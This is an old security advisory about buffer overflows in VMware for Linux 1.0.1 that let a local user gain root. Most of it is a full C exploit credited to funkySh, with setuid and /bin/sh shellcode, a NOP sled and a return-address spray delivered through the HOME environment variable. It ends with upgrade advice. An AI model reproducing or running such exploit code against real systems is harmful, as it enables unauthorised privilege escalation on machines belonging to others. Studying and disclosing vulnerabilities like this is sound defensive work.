COMMAND
VMware
SYSTEMS AFFECTED
VMware for Linux 1.0.1 and previous
PROBLEM
The security hole allows a buffer overrun attack against VMware
for Linux to result in unprivileged root access to a machine.
VMware v1.0.1 is a software product by VMware, Inc. that creates a
virtual machine in which you can install multiple operating
systems without repartitioning or formatting your hard drive.
Team Asylum has found multiple buffer overflows existing in VMware
v1.0.1 for Linux. Earlier versions also have the same buffer
overflows. Any local user can exploit these overflows to gain
root access. funkySh posted following code that exploits
vulnerability:
/*
* VMware v1.0.1 root sploit
* funkySh 02/07/99
*
* 1. Redhat 5.2 2.2.9 offset 800-1100
* 2. offset 1600-2200
* 1. Slackware 3.6 2.2.9 offset 0
* 2. offset ?
*
* [ 1 - started from xterm on localhost ]
* [ 2 - started from telnet, with valid display ]
*/
#include <stdio.h>
char code[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define BUFFER 1032
#define NOP 0x90
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"
char buf[BUFFER];
void main(int argc, char * argv[])
{
int i, offset = 0;
if(argc > 1) offset = atoi(argv[1]);
memset(buf,NOP,BUFFER);
memcpy(buf+800,code,strlen(code));
for(i=854+2;i<BUFFER-2;i+=4)
*(int *)&buf[i]=RET_ADDR+offset;
setenv("HOME", buf, 1);
execl(PATH,"vmware","-display","127.0.0.1:0",0);
/* change IP if required */
}
SOLUTION
All users are encouraged to upgrade to VMware v1.0.2. You may
download it directly off http://www.vmware.com.